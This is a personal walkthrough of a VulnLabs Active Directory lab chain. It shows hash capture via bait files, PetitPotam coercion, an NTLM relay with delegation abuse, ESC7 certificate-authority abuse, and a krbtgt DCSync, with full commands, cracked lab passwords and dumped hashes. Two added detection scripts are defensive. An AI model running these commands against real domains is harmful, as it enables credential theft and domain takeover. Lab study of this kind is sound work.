
Intercept (Chain)

This is not a writeup, just my notes about VulnLabs machines.


Last updated 1 month ago

Operating System: Microsoft Windows Server 2022 Standard

Chain: True (2 Machines)

Credentials

Username          Password          Method              Scope
kathryn.spencer   Chocolate1        Capture NTLMv2      Domain User
Simon.Bowen       b0OI_fHO859+Aw    NTLM Relay attack   Domain User

✅ Valid Usernames

Rhys.King
Kathryn.Spencer
Dale.King
Billy.Watson
Hayley.Jennings
Vincent.Woods
Dorothy.Ford
Simon.Bowen
Reece.Vaughan
Louise.Williams

🔑 Passwords list

Chocolate1

Information Gathering

Nmap Scan

Nmap scan report for 10.10.141.165
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-30 01:05:24Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intercept.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intercept.vl0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intercept.vl0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intercept.vl0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55168/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55195/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55206/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55221/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Nmap scan report for 10.10.141.166
PORT      STATE SERVICE       REASON          VERSION
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7680/tcp open  tcpwrapped    syn-ack ttl 127

Service Enumeration

10.10.202.53

DNS

  • Not vulnerable to DNS Zone Transfer AXFR

SMB (enum4linux-ng)

  • Domain SID: S-1-5-21-3031021547-1480128195-3014128932

  • Root/Parent Domain Controller

  • Domain: intercept.vl

  • NetBIOS: DC01

  • FQDN: DC01.intercept.vl

  • Server allows null session authentication

Kerberos (Kerbrute)

  • statistically-likely-usernames/john.smith.txt returned valid usernames

10.10.202.54

SMB (Enum4linux-ng)

  • NetBIOS: WS01

  • Domain: intercept.vl

  • FQDN: WS01.intercept.vl

  • Server allows null session authentication

  • Server allows guest user authentication. (Useful)

  • Available Folder for guest authentication:

    • dev - READ,WRITE

    • Users - READ

Compromising domain user

Finding valid usernames

  1. No account was configured with UF_DONT_REQUIRE_PREAUTH set

  2. No account uses its username as password

  3. No account has an empty password

❯ /opt/kerbrute/kerbrute userenum -d intercept.vl --dc 10.10.141.165 /opt/statistically-likely-usernames/john.smith.txt  -t 65

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 04/29/25 - Ronnie Flathers @ropnop

2025/04/29 21:14:15 >  Using KDC(s):
2025/04/29 21:14:15 >  	10.10.202.53:88

2025/04/29 21:14:39 >  [+] VALID USERNAME:	louise.williams@intercept.vl
2025/04/29 21:16:20 >  [+] VALID USERNAME:	dale.king@intercept.vl
2025/04/29 21:16:50 >  [+] VALID USERNAME:	billy.watson@intercept.vl
2025/04/29 21:24:33 >  Done! Tested 248231 usernames (3 valid) in 618.232 seconds

Finding interesting files

Readme1.txt
--------------------------
Please check this share regularly for updates to the application (this is a temporary solution until we switch to gitlab).


Readme2.txt
-------------------------
Driver still in development, coming soon.

Crafting malicious files to capture NTLMv2 hashes

❯ python3 ntlm_theft.py -g all --server 10.8.5.48 --filename update
Created: update/update.scf (BROWSE TO FOLDER)
Created: update/update-(url).url (BROWSE TO FOLDER)
Created: update/update-(icon).url (BROWSE TO FOLDER)
Created: update/update.lnk (BROWSE TO FOLDER)
Created: update/update.rtf (OPEN)
Created: update/update-(stylesheet).xml (OPEN)
Created: update/update-(fulldocx).xml (OPEN)
Created: update/update.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: update/update-(includepicture).docx (OPEN)
Created: update/update-(remotetemplate).docx (OPEN)
Created: update/update-(frameset).docx (OPEN)
Created: update/update-(externalcell).xlsx (OPEN)
Created: update/update.wax (OPEN)
Created: update/update.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: update/update.asx (OPEN)
Created: update/update.jnlp (OPEN)
Created: update/update.application (DOWNLOAD AND OPEN)
Created: update/update.pdf (OPEN AND ALLOW)
Created: update/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: update/Autorun.inf (BROWSE TO FOLDER)
Created: update/desktop.ini (BROWSE TO FOLDER)
Generation Complete.

Uploading the files into the dev share

❯ smbclient '\\10.10.141.166\dev' -U 'Intrusionz3r0' -N
Try "help" to get a list of possible commands.
smb: \> recurse true
smb: \> mput *

Capturing Kathryn.Spencer's NTLMv2 hash

❯ sudo responder -I tun0
[sudo] password for Intrusionz3r0: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

<SNIP>

[!] Error starting TCP server on port 21, check permissions or other servers running.
[SMB] NTLMv2-SSP Client   : 10.10.202.54
[SMB] NTLMv2-SSP Username : INTERCEPT\Kathryn.Spencer
[SMB] NTLMv2-SSP Hash     : Kathryn.Spencer::INTERCEPT:3c715996a067a873:C8AEFC889DC694DEA73FF54D835AED5A:010100000000000000F7EDFF4CB9DB01036D385A42F6D0490000000002000800510039004400350001001E00570049004E002D0058004200450030004E0047004400440033004600540004003400570049004E002D0058004200450030004E004700440044003300460054002E0051003900440035002E004C004F00430041004C000300140051003900440035002E004C004F00430041004C000500140051003900440035002E004C004F00430041004C000700080000F7EDFF4CB9DB01060004000200000008003000300000000000000000000000002000002527C21C90E08E8970AA5B6BE1D741B88F53D12507CFF8AC16F533BB15E699560A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0035002E00340038000000000000000000

Cracking

❯ hashcat -m 5600 kathryn.spencer.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

KATHRYN.SPENCER::INTERCEPT:3c715996a067a873:c8aefc889dc694dea73ff54d835aed5a:<SNIP>:Chocolate1

Credentials found: KATHRYN.SPENCER:Chocolate1

Default enumeration with valid credentials:

  • Retrieved valid usernames

  • Password spraying (empty password, username as password) was unsuccessful

  • No AS-REP roastable users

  • No Kerberoastable users

  • No vulnerable ADCS templates

    • Found PKI Enrollment Server: DC01.intercept.vl

    • Found CN: intercept-DC01-CA

  • MachineAccountQuota is 10, so kathryn.spencer can add computer accounts to the domain.

  • NetExec coerce_plus module:

    • VULNERABLE, DFSCoerce

    • VULNERABLE, PetitPotam

    • VULNERABLE, PrinterBug

    • VULNERABLE, MSEven

Discovering an exploitable LDAP misconfiguration

  • LDAP Signing NOT Enforced!

  • LDAPS Channel Binding is set to "NEVER"

❯ nxc ldap 10.10.141.165-166 -u kathryn.spencer  -p 'Chocolate1' -M ldap-checker
SMB         10.10.202.53    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False)
LDAP        10.10.202.53    389    DC01             [+] intercept.vl\kathryn.spencer:Chocolate1 
LDAP-CHE... 10.10.202.53    389    DC01             LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.202.53    389    DC01             LDAPS Channel Binding is set to "NEVER"

Discovering an available WebClient service

#Enumerate WebClient Using NetExec
❯ nxc smb 10.10.141.165-166 -u kathryn.spencer  -p 'Chocolate1' -M webdav
SMB         10.10.202.53    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False)
SMB         10.10.202.54    445    WS01             [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:intercept.vl) (signing:False) (SMBv1:False)
SMB         10.10.202.53    445    DC01             [+] intercept.vl\kathryn.spencer:Chocolate1 
SMB         10.10.202.54    445    WS01             [+] intercept.vl\kathryn.spencer:Chocolate1 
WEBDAV      10.10.202.54    445    WS01             WebClient Service enabled on: 10.10.202.54

#Enumerate WebClient Using webclientservicescanner 
❯ webclientservicescanner intercept.vl/kathryn.spencer:Chocolate1@10.10.141.165
WebClient Service Scanner v0.1.0 - pixis (@hackanddo) - Based on @tifkin_ idea

[10.10.202.53] STOPPED
[10.10.202.54] RUNNING

#Enumerate Webclient Using GetWebDAVStatus.exe
GetWebDAVStatus.exe 10.10.141.166

WebClient Service enabled on: 10.10.141.166

WebClient service can be indirectly abused by attackers to coerce authentications. This technique needs to be combined with other coercion techniques (e.g. PetitPotam, PrinterBug), or multicast poisoning, to act as a booster for these techniques. It allows attackers to elicit authentications made over HTTP instead of SMB, hence heightening NTLM relay capabilities.

Abusing NTLM Relay Attack

To successfully carry out this attack, the environment must have the following misconfigurations:

  • LDAP Signing is NOT enforced

  • LDAPS Channel Binding is set to "NEVER"

  • MachineAccountQuota > 0 (allows low-privileged users to create computer accounts)

  • PetitPotam vulnerability is present

  • Valid NetBIOS name resolution via Responder

  • Intranet zone conditions have to be met.

    • This means registering the NetBIOS machine name that Responder generates as a DNS record in the domain, pointing at our host

Running Responder to obtain a NetBIOS machine name

In /usr/share/responder/Responder.conf set SMB = Off and HTTP = Off, so that ntlmrelayx can bind ports 445 and 80

❯ sudo responder -I eth0 -w
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

  
[+] Current Session Variables:
    Responder Machine Name     [WIN-5XYKF0PVHHL]
    Responder Domain Name      [R6XA.LOCAL]
    Responder DCE-RPC Port     [45461]

Adding our machine to the domain’s DNS records

❯ python3 ~/Documents/tools/krbrelayx/dnstool.py -u 'intercept.vl\KATHRYN.SPENCER' -p Chocolate1 --action add --record WIN-5XYKF0PVHHL.intercept.vl --data 10.8.5.48 --type A 10.10.141.165
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Coercing Authentication

❯ sudo python3 PetitPotam.py -d "intercept.vl" -u "kathryn.spencer" -p "Chocolate1"  WIN-5XYKF0PVHHL@80/Intrusionz3r0 10.10.141.166
Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.141.166[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

Relaying the coerced authentication with ntlmrelayx

❯ impacket-ntlmrelayx -t ldaps://DC01.intercept.vl --delegate-access -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] HTTPD(80): Connection from 10.10.141.166 controlled, attacking target ldaps://DC01.intercept.vl
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] HTTPD(80): Authenticating against ldaps://DC01.intercept.vl as INTERCEPT/WS01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] HTTPD(80): Connection from 10.10.141.166 controlled, attacking target ldaps://DC01.intercept.vl
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] Attempting to create computer in: CN=Computers,DC=intercept,DC=vl
[*] Adding new computer with username: JDJUKOKR$ and password: k4f6$32#HX2#$/{ result: OK
[*] Delegation rights modified succesfully!
[*] JDJUKOKR$ can now impersonate users on WS01$ via S4U2Proxy
<SNIP>
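A detection written for this note (added here; it is not part of the original page or of any of the tools above) that looks for the result shown in the ntlmrelayx output: a machine account creating a computer account (Security event 4741) and then writing msDS-AllowedToActOnBehalfOfOtherIdentity on its own object (event 5136, which only exists when "Audit Directory Service Changes" and a SACL on computer objects are configured). The event dicts, timestamps and the benign Dale.King join are constructed samples with simplified field names.

```python
from datetime import datetime, timedelta

# Constructed sample Security-log events (simplified to the fields the logic needs;
# real 4741/5136 events carry these inside EventData). They mirror the relay result
# above: WS01$'s relayed LDAPS session creates JDJUKOKR$ and then writes
# msDS-AllowedToActOnBehalfOfOtherIdentity on WS01's own computer object.
SAMPLE_EVENTS = [
    {"time": "2025-04-30T01:20:03", "id": 4741, "subject": "WS01$",
     "target": "JDJUKOKR$"},
    {"time": "2025-04-30T01:20:05", "id": 5136, "subject": "WS01$",
     "dn": "CN=WS01,CN=Computers,DC=intercept,DC=vl",
     "attribute": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    # benign: a helpdesk user joins a new workstation to the domain
    {"time": "2025-04-30T02:00:00", "id": 4741, "subject": "Dale.King",
     "target": "WS02$"},
]

RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"


def is_machine_account(name):
    return name.endswith("$")


def account_of_dn(dn):
    """'CN=WS01,CN=Computers,DC=intercept,DC=vl' -> 'WS01$' (first RDN plus '$')."""
    first_rdn = dn.split(",")[0]
    return first_rdn.split("=", 1)[1] + "$"


def detect_relay_rbcd(events, window=timedelta(minutes=10)):
    """Return (severity, message) findings for the relay-to-LDAP + RBCD pattern.

    Rule 1 (4741): a machine account creating another computer account is unusual;
                   users join machines, machines normally do not (MachineAccountQuota abuse).
    Rule 2 (5136): a computer account writing the RBCD attribute on its own object is
                   how a relayed machine authentication hands delegation to the attacker.
    Both for the same subject within `window` -> high confidence.
    """
    findings = []
    creations = {}  # subject (lowercase) -> [(time, created account)]
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        subj = ev["subject"].lower()
        if ev["id"] == 4741 and is_machine_account(subj):
            findings.append(("medium",
                             f"{ev['subject']} (machine account) created computer {ev['target']}"))
            creations.setdefault(subj, []).append((t, ev["target"]))
        elif ev["id"] == 5136 and ev.get("attribute", "").lower() == RBCD_ATTR:
            owner = account_of_dn(ev["dn"])
            if owner.lower() != subj:
                # someone else (admin, automation) changed RBCD on this host: review, not alarm
                findings.append(("low", f"{ev['subject']} modified RBCD on {owner}"))
                continue
            recent = [acct for (ct, acct) in creations.get(subj, []) if t - ct <= window]
            msg = f"{ev['subject']} wrote RBCD on its own computer object"
            if recent:
                msg += f" right after creating {', '.join(recent)} (relay-to-LDAP pattern)"
            findings.append(("high" if recent else "medium", msg))
    return findings


if __name__ == "__main__":
    for sev, msg in detect_relay_rbcd(SAMPLE_EVENTS):
        print(f"[{sev.upper()}] {msg}")
```

The same two events are the ones that disappear once LDAP signing and channel binding are enforced and MachineAccountQuota is set to 0, which is the fix for the preconditions listed above.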

Abusing Resource Based Constrained Delegation

❯ impacket-rbcd -delegate-from 'JDJUKOKR$' -delegate-to 'WS01$' -action 'write' 'intercept.vl/JDJUKOKR$:k4f6$32#HX2#$/{'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Accounts allowed to act on behalf of other identity:
[*]     JDJUKOKR$    (S-1-5-21-3031021547-1480128195-3014128932-4101)
[*] JDJUKOKR$ can already impersonate users on WS01$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     JDJUKOKR$    (S-1-5-21-3031021547-1480128195-3014128932-4101)

Requesting a service ticket for Administrator using S4U2Self/S4U2Proxy

❯ impacket-getST 'intercept.vl/JDJUKOKR$:k4f6$32#HX2#$/{' -spn 'cifs/ws01.intercept.vl' -impersonate Administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache

Dumping SAM database and LSA Secrets

❯ KRB5CCNAME='Administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache' impacket-secretsdump -k -no-pass WS01.intercept.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x04718518c7f81484a5ba5cc7f16ca912
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:831cbc509daa37aff98250b635e7f482:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:48daaaaa9654c3754d42b40e292ba63f:::
[*] Dumping cached domain logon information (domain/username:hash)
INTERCEPT.VL/Simon.Bowen:$DCC2$10240#Simon.Bowen#35e1bb1dbd5f474e21819bb03ae5d103: (2023-06-27 20:07:12)
INTERCEPT.VL/Kathryn.Spencer:$DCC2$10240#Kathryn.Spencer#4d8e1b44d30998c82793a9808b959d91: (2023-06-29 11:51:33)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
INTERCEPT\WS01$:plain_password_hex:a5acf58651f67d4a49babcc008c3894b20ed9193d53362b81deadc3136844af97c775d4074d3c5f9c5ba5c0c55cad0d2f1992739b2a73921b1c8eaddebb652e0fe278f269dbda7a47f1e0fd8d2e816bcfa745344dcbb466e8c213a0d195b1d9e57ed4ff0888e905733fc959ef6c1dbd4e6001b38267fe3aa235834b75157d5ca4bd6cf8aba19b3a31afd5613c0acb1ec1365d5b737de435530792888678b811b7a060cf5f07313e216d1f3b90de551264f99f95c014fddc0ff738263d3eea3d0d75d8431b431d3e225787869658140e269405dd4a9c83d13fffac52e50a3d7402735d1b29f71c356ff7106a5088baff3
INTERCEPT\WS01$:aad3b435b51404eeaad3b435b51404ee:ff4e454b3439375b1a4d88b732ce4232:::
[*] DefaultPassword 
intercept.vl\Kathryn.Spencer:Chocolate1
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xf6f65580470c139808ab7f0ffb709773d1531dc3
dpapi_userkey:0x24122e60857c28b7f2e6bdd138f22e3e4ddd58f3
[*] NL$KM 
 0000   4C A8 6F 51 3B B6 E6 22  0B A7 7A FD 4F 32 EA BC   L.oQ;.."..z.O2..
 0010   78 7A 98 1E DD 83 F2 70  37 73 9B 6C D0 03 9B 7F   xz.....p7s.l....
 0020   FA EA 8D AF A0 84 F9 0D  24 17 3C C9 97 3D 8A E7   ........$.<..=..
 0030   BC EE 5D B7 20 73 02 B7  E1 A7 62 E6 4D 8E F8 ED   ..]. s....b.M...
NL$KM:4ca86f513bb6e6220ba77afd4f32eabc787a981edd83f27037739b6cd0039b7ffaea8dafa084f90d24173cc9973d8ae7bcee5db7207302b7e1a762e64d8ef8ed
[*] _SC_HelpdeskService 
Simon.Bowen@intercept.vl:b0OI_fHO859+Aw
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

Credentials found: Simon.Bowen:b0OI_fHO859+Aw

Compromise Domain Controller

During the enumeration phase, it was discovered that the user Simon.Bowen is a member of the HelpDesk domain group. This group has GenericAll permissions over the CA-Managers group, which manages the enterprise Certificate Authority (CA) intercept-DC01-CA.

This attack exploits ESC7, where over-permissioned users or groups are able to reconfigure the Certificate Authority. By enabling a template that accepts a Subject Alternative Name (SAN), approving its own pending request and issuing a certificate for Administrator, the attacker escalates to Domain Admin privileges without triggering standard authentication alerts.

Adding simon.bowen to ca-managers domain group

❯ bloodyAD --host dc01 -d intercept.vl -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' add groupMember 'ca-managers' 'Simon.Bowen'
[+] Simon.Bowen added to ca-managers

Enabling SubCA Template

❯ certipy-ad ca -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.141.165 -ca intercept-DC01-CA -enable-template 'SubCA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'intercept-DC01-CA'

Adding officer on intercept-DC01-CA

❯ certipy-ad ca -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.141.165 -ca intercept-DC01-CA -add-officer Simon.Bowen
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Simon.Bowen' on 'intercept-DC01-CA'

Requesting Administrator certificate using Subject Alternative Name (SAN)

❯ certipy-ad req -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.141.165 -ca intercept-DC01-CA -template SubCA -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 5
Would you like to save the private key? (y/N) y
[*] Saved private key to 5.key
[-] Failed to request certificate

Although initial enrollment failed due to template restrictions, the request was submitted and manually approved via:

Approving administrator certificate

❯ certipy-ad ca -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.141.165 -ca intercept-DC01-CA -issue-request 5
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate

Retrieving Administrator certificate

❯ certipy-ad req -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.141.165 -ca intercept-DC01-CA -retrieve 5
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 5
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Loaded private key from '5.key'
[*] Saved certificate and private key to 'administrator.pfx'

Requesting Administrator's Ticket Granting Ticket

❯ certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.141.165 -user Administrator -domain intercept.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@intercept.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@intercept.vl': aad3b435b51404eeaad3b435b51404ee:ad95c338a6cc5729ae7390acbe0ca91f
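A detection for the ESC7 sequence above, added to this note and not part of the original page or of Certipy: it correlates the CA's Security-log audit events and flags a principal that changes CA permissions (event 4882, assumed here to be what -add-officer produces), then issues its own pending request (4886 received, 4889 set to pending, 4887 approved and issued), and any issuance from the SubCA template. The events are constructed samples with simplified field names; CA auditing (certutil -setreg CA\AuditFilter 127 plus a CertSvc restart) must be on for the real ones to exist.

```python
# Constructed, simplified AD CS audit events from the CA host's Security log. Real
# events carry these as EventData fields and the event IDs used here are an assumption
# about how the steps above are logged. Sequence mirrored: Simon.Bowen changes CA
# permissions (adds himself as officer), his SubCA request with an Administrator UPN
# is held as pending (request 5), and he then issues it himself.
SAMPLE_EVENTS = [
    {"id": 4882, "subject": "INTERCEPT\\Simon.Bowen"},
    {"id": 4886, "request_id": 5, "requester": "INTERCEPT\\Simon.Bowen", "template": "SubCA"},
    {"id": 4889, "request_id": 5, "requester": "INTERCEPT\\Simon.Bowen"},
    {"id": 4887, "request_id": 5, "requester": "INTERCEPT\\Simon.Bowen",
     "subject": "INTERCEPT\\Simon.Bowen", "template": "SubCA"},
    # benign: a User-template request held for review and approved by a different officer
    {"id": 4886, "request_id": 6, "requester": "INTERCEPT\\Dale.King", "template": "User"},
    {"id": 4889, "request_id": 6, "requester": "INTERCEPT\\Dale.King"},
    {"id": 4887, "request_id": 6, "requester": "INTERCEPT\\Dale.King",
     "subject": "INTERCEPT\\Hayley.Jennings", "template": "User"},
]


def _norm(name):
    return name.lower()


def detect_esc7(events):
    """Return (severity, message) findings.

    high   : a principal that changed CA permissions (4882) later issued (4887) a request
             that was pending (4889) and that it had submitted itself (4886).
    medium : self-issuance without a preceding permission change, or any certificate
             issued from the SubCA template (it accepts an enrollee-supplied SAN).
    """
    findings = []
    permission_changers = set()   # subjects of 4882 seen so far
    pending = set()               # request ids set to pending (4889)
    requester_of = {}             # request id -> requester (from 4886)
    for ev in events:
        eid = ev["id"]
        if eid == 4882:
            permission_changers.add(_norm(ev["subject"]))
        elif eid == 4886:
            requester_of[ev["request_id"]] = _norm(ev["requester"])
        elif eid == 4889:
            pending.add(ev["request_id"])
        elif eid == 4887:
            rid = ev["request_id"]
            approver = _norm(ev["subject"])            # who resubmitted/approved it
            requester = requester_of.get(rid, _norm(ev["requester"]))
            template = ev.get("template", "?")
            if rid in pending and approver == requester:
                sev = "high" if approver in permission_changers else "medium"
                msg = f"request {rid}: {ev['subject']} issued its own pending {template} request"
                if sev == "high":
                    msg += " after changing CA permissions"
                findings.append((sev, msg))
            if template.lower() == "subca":
                findings.append(("medium",
                                 f"request {rid}: certificate issued from the SubCA template to {ev['requester']}"))
    return findings


if __name__ == "__main__":
    for sev, msg in detect_esc7(SAMPLE_EVENTS):
        print(f"[{sev.upper()}] {msg}")
```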

Performing DCSync Attack

❯ impacket-secretsdump intercept.vl/administrator@10.10.141.165 -hashes aad3b435b51404eeaad3b435b51404ee:ad95c338a6cc5729ae7390acbe0ca91f -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6ff6959c0c141860804532b61d7cbe2f:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:1c1047fe5fa8d7dc5810b174e13d28a17c8afb7ddd9c56577038d088ebb46b38
krbtgt:aes128-cts-hmac-sha1-96:04e31eb0a8c63d0f972e12d4c744331a
krbtgt:des-cbc-md5:852a92ab152cb952
[*] Cleaning up...